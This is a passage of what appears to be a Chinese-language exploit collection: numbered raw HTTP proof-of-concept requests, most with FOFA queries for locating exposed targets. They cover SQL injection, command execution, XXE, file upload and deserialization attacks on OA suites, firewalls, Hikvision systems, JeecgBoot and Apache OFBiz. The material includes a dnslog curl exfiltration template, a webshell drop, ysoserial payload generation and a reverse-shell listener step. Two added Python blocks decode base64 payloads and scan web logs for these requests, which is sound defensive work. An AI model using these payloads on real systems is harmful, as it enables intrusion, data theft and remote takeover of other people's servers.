GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. 万户ezEIP success.aspx command execution
FOFA: app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

The SID header carries the command as base64: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk= decodes to type C:\Windows\win.ini.

71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL injection
FOFA: body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

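Entries 60 and 70 above both hide the real payload inside a base64 value (the sql query parameter in one case, the SID request header in the other), so a reviewer reading a captured request or a WAF log sees only an opaque token. The Python below is an added example and not code from the original post: it parses the request line and headers of a raw HTTP request, picks out query parameters and header values that are well-formed base64 and decode to printable text, and returns them decoded so the injected SQL or OS command is visible at a glance. The two request constants are copied from entries 60 and 70 with only the headers the example needs; the function names and the base64 heuristic are the example's own choices, and the body is deliberately ignored because neither entry carries its payload there.

```python
import base64
import binascii
import re
from urllib.parse import unquote

# Heuristic for a standard-alphabet base64 token: 12+ chars, optional '=' padding,
# total length a multiple of 4. Short values such as "close" or "C" never qualify.
B64_TOKEN = re.compile(r"^[A-Za-z0-9+/]{12,}={0,2}$")


def try_b64_decode(value):
    """Return the text a base64 token decodes to, or None when the value is not
    base64, does not decode to UTF-8, or decodes to non-printable bytes."""
    if len(value) % 4 or not B64_TOKEN.match(value):
        return None
    try:
        text = base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def decode_request(raw_request):
    """Parse the request line and headers of a raw HTTP request and return a dict
    mapping 'query:<name>' and 'header:<name>' to the decoded text of every value
    that is a base64 token. The body is ignored: entries 60 and 70 carry the
    payload in the URL and in a header respectively."""
    head = raw_request.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = [ln for ln in head.split("\n") if ln.strip()]
    _method, target, _version = lines[0].split(" ", 2)
    found = {}
    # Split the query by hand and use unquote (not unquote_plus) so that a literal
    # '+' inside a base64 value is not turned into a space before decoding.
    query = target.partition("?")[2]
    for pair in filter(None, query.split("&")):
        name, _, value = pair.partition("=")
        decoded = try_b64_decode(unquote(value))
        if decoded is not None:
            found["query:" + unquote(name)] = decoded
    for line in lines[1:]:
        name, _, value = line.partition(":")
        decoded = try_b64_decode(value.strip())
        if decoded is not None:
            found["header:" + name.strip()] = decoded
    return found


# Requests copied from entries 60 and 70 above, trimmed to the headers the example needs.
SMART_REQUEST = """\
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Connection: close

"""

EZEIP_REQUEST = """\
POST /member/success.aspx HTTP/1.1
Host: x.x.x.x
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C

__VIEWSTATE=PAYLOAD
"""

if __name__ == "__main__":
    for req in (SMART_REQUEST, EZEIP_REQUEST):
        print(decode_request(req))
```

The printable-text filter matters: the value exportexcelbysql in entry 60 is also a syntactically valid base64 token, but it decodes to control bytes and is correctly dropped, so only the sql parameter and the SID header come back decoded.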
- S1 m3 \% y+ C! d* ?3 }# ^1 [0 E72. 致远OA getAjaxDataServlet XXE# I* j" Y0 M7 `; t& a3 k; E
FOFA:app="致远互联-OA"( g- I* A9 d4 u# f
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.11 ?" ]& N% `5 M6 t3 m# j# L
Host: 192.168.40.131:8099
! \$ X% _1 v* V# cUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
8 Q0 z6 B( o* q" q- z$ \$ [Connection: close6 C# S5 p7 C' l$ z/ S# K
Content-Length: 583% Z1 t3 t) q, K8 x# H
Content-Type: application/x-www-form-urlencoded
! U: \5 W* F- V% y" |+ w+ \ u9 ~Accept-Encoding: gzip/ E8 ]+ Q- f; i! @# G% K
, d r. G; s8 @2 [4 S5 b. V k# w
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
& F4 O8 w$ s, U& X2 @+ g# k! S* y' u! T# ^. u; R! p; ]
! B! u0 k$ f; C* g
73. GeoServer wms remote code execution
FOFA: icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. 致远 M3-server 6_1sp1 deserialization RCE
FOFA: title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA: app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then read the command output:

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. 新开普掌上校园服务管理平台 service.action remote command execution
FOFA: title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

UnitCode is evaluated as a FreeMarker template; the Execute utility runs the command, which writes a marker file under webapps/ROOT. Read it back with:

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22服装管理软件系统 UploadHandler.ashx arbitrary file upload
FOFA: body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs 建设工程质量监督系统 FileUpload.ashx file upload
FOFA: icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

Then confirm the file landed in the target directory:

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE 百为流控路由器 remote command execution
FOFA: BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达天耀软件 DesignReportSave.jsp arbitrary file upload
FOFA: app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

Then request the written JSP:

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
FOFA: app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b remote command execution
FOFA: app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA: title=="JeecgBoot 企业级低代码平台"
POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA: title=="JeecgBoot 企业级低代码平台"
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA: body="sysaid-logo-dark-green.png"
The exploit request below drops a Godzilla (哥斯拉) webshell:
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Resulting shell URL: http://x.x.x.x/userfiles/index.jsp

86. Japanese tosei self-service laundry machine RCE
FOFA: body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. 安恒明御安全网关 aaa_local_web_preview file upload
FOFA: title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

Then request /jfhatuwe.php; the suffix parameter, not the multipart filename, decides where the file is written.

88. 安恒明御安全网关 aaa_portal_auth_config_reset remote command execution
FOFA: title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

The type parameter decodes to a newline followed by echo '<?php echo "assdwdmpidmsbzoabahpjhnokiduw"; phpinfo(); ?>' >> /usr/local/webui/txzfsrur.php, so the PHP file is appended under the web root. Then request /txzfsrur.php and look for the marker string.

89. 致远互联FE协作办公平台 editflow_manager SQL injection
FOFA: title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

%70 is the letter p, so the request reaches editflow_manager.jsp while a filter matching on the literal .jsp suffix does not fire; a vulnerable target evaluates 111*222 and returns 24642.

90. 海康威视 (Hikvision) IP网络对讲广播系统 3.0.3_20201113_RELEASE remote command execution
FOFA: icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. 海康威视 (Hikvision) 综合安防管理平台 orgManage/v1/orgs/download arbitrary file read
FOFA: title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

The ..;/ segment is the same Tomcat path-parameter trick as in entries 68 and 69: the container drops the ;, resolves .., and dispatches the request to /center/api/orgManage/v1/orgs/download.

92. 海康威视 (Hikvision) 运行管理中心 session command execution
Fastjson command execution
hunter: web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. 奇安信网神SecGate3600防火墙 app_av_import_save arbitrary file upload
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

Then fetch the uploaded file:

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

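For defenders working from this list, the request paths in entries 57 through 93 above are usable as web-log signatures, but only if the request target is normalized first: several entries rely on a percent-encoded extension (editflow_manager.js%70 in entry 89), a Tomcat path parameter (wf_printnum.jsp;.js in entries 68 and 69, ..;/ in entry 91) or unusual casing to slip past suffix- and prefix-based filters, and a naive substring match on the raw log line misses exactly those requests. The Python below is an added example, not part of the original post or of any vendor's tooling: it decodes and resolves each request target the way a servlet container would, matches it against a subset of signatures taken from the entries above, and flags the MSSQL injection fragments (WAITFOR DELAY, HashBytes, @@version, UNION SELECT) used by the time-based and hash-oracle checks when they appear in the decoded query string. The log lines are constructed for the example and modelled on the requests in entries 57, 68, 89, 91 and 93; the signature labels and the selection in the table are the example's own. Entries whose payload travels only in a POST body (for example 64, 65 and 76) cannot be matched from an access log this way and need request-body capture or a WAF.

```python
import re
from urllib.parse import unquote

# Combined/common log format: client, "METHOD target HTTP/x", status. Only these fields are used.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# (label, lowercase normalized-path fragment, lowercase decoded-query fragment or None).
# The paths come from the entries above; the labels and this selection are the example's own.
SIGNATURES = [
    ("57/58 Chanjet T+ UFAQD SQLi", "/tplus/ufaqd/", None),
    ("60 Smart importexport.php SQLi", "/importexport.php", "type=exportexcelbysql"),
    ("62 IP-guard view.php RCE", "/flexpaper/php/view.php", "page="),
    ("63 IP-guard getdatarecord file read", "/downloadfile_client/getdatarecord", None),
    ("66 ezOFFICE SendFileCheckTemplateEdit SQLi", "/sendfilechecktemplateedit.jsp", None),
    ("67 ezOFFICE wpsservlet upload", "/defaultroot/wpsservlet", "option=savenewfile"),
    ("68 ezOFFICE wf_printnum.jsp SQLi", "/wf_printnum.jsp", None),
    ("69 ezOFFICE contract_gd.jsp SQLi", "/contract/contract_gd.jsp", None),
    ("72 Seeyon getAjaxDataServlet XXE", "/runsignature/run/getajaxdataservlet", None),
    ("83 JeecgBoot testConnection RCE", "/jmreport/testconnection", None),
    ("84 JimuReport queryFieldBySql SSTI", "/jmreport/queryfieldbysql", None),
    ("85 SysAid userentry RCE", "/userentry", "accountid=../"),
    ("87/88 安恒 webui aaa_* handlers", "/webui/", "g=aaa_"),
    ("89 FE editflow_manager SQLi", "/sysform/003/editflow_manager.jsp", None),
    ("91 Hikvision orgs/download file read", "/orgmanage/v1/orgs/download", "filename=../"),
    ("93 SecGate3600 app_av_import_save upload", "/", "g=app_av_import_save"),
]

# MSSQL fragments used by the time-based and hash-oracle injection checks in the entries above.
SQLI_MARKERS = ("waitfor delay", "hashbytes(", "@@version", "union all select", "union select")


def normalize_target(target):
    """Return (path, query), both lowercase and percent-decoded, with the evasions
    used above undone: ';param' path parameters are stripped from every segment
    (x.jsp;.js -> x.jsp, '..;' -> '..') and '.'/'..' segments are resolved the way
    a servlet container resolves them before the request reaches the application."""
    raw_path, _, raw_query = target.partition("?")
    segments = [seg.split(";", 1)[0] for seg in unquote(raw_path).split("/")]
    resolved = []
    for seg in segments:
        if seg == "..":
            if resolved:
                resolved.pop()
        elif seg and seg != ".":
            resolved.append(seg)
    return "/" + "/".join(resolved).lower(), unquote(raw_query).lower()


def scan_log(lines):
    """Return a list of (client, label, normalized path, markers) tuples, one per
    request that matches a signature or carries an injection marker. Payloads that
    travel only in a request body are not visible in an access log."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a request line in the expected format
        path, query = normalize_target(m["target"])
        markers = tuple(mk for mk in SQLI_MARKERS if mk in query)
        hits = [label for label, sig_path, sig_query in SIGNATURES
                if sig_path in path and (sig_query is None or sig_query in query)]
        if markers and not hits:
            hits.append("generic MSSQL injection marker")
        for label in hits:
            findings.append((m["ip"], label, path, markers))
    return findings


# Constructed log lines modelled on the requests in entries 57, 68, 89, 91 and 93, plus one benign request.
SAMPLE_LOG = """\
10.0.0.5 - - [12/May/2024:10:01:02 +0800] "GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1" 200 1832
10.0.0.5 - - [12/May/2024:10:01:03 +0800] "GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1" 200 512
10.0.0.9 - - [12/May/2024:10:02:11 +0800] "POST /sysform/003/editflow_manager.js%70 HTTP/1.1" 200 77
10.0.0.9 - - [12/May/2024:10:02:12 +0800] "GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1" 200 2048
10.0.0.9 - - [12/May/2024:10:02:13 +0800] "POST /?g=app_av_import_save HTTP/1.1" 200 310
192.168.1.20 - - [12/May/2024:10:03:00 +0800] "GET /index.php?page=home HTTP/1.1" 200 4096
"""

if __name__ == "__main__":
    for client, label, path, markers in scan_log(SAMPLE_LOG.splitlines()):
        print(f"{client:14} {label:45} {path} {' '.join(markers)}")
```

The path normalization is the part worth keeping even if the signature table is swapped for a vendor feed: the editflow_manager.js%70 and ..;/ lines only match after decoding and resolution, and the same step prevents a detection from being bypassed by inserting ;x or /./ into an otherwise unchanged path.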
94. 奇安信网神SecGate3600防火墙 obj_area_import_save arbitrary file upload
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

Then fetch the uploaded file (the name given in the upfile part):

GET /attachements/cciytdzu.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>


Generate the payload with ysoserial
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"


Replace the payload in the PoC above with the generated one
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip
PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55
groovyProgram=throw+new+Exception('id'.execute().text);


Reverse shell
Start a listener on Kali
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
